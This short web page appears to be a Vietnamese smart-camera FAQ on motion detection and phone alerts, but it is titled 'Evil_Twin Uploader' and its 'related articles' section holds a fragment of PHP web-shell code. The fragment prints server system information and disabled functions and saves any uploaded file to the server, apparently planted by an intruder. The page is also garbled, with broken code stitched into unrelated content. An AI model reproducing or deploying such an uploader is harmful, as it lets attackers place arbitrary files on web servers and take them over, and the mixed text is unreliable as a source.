Evil_Twin Uploader

Chức năng phát hiện chuyển động của camera thông minh là gì?

Camera sẽ tự động ghi nhận những chuyển động và âm thanh bất thường xung quanh khu vực giám sát. Khi bật chế độ cảnh báo, nếu phát hiện có chuyển động bất thường, nó sẽ tự động gửi nhắc nhở đến điện thoại của bạn.

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial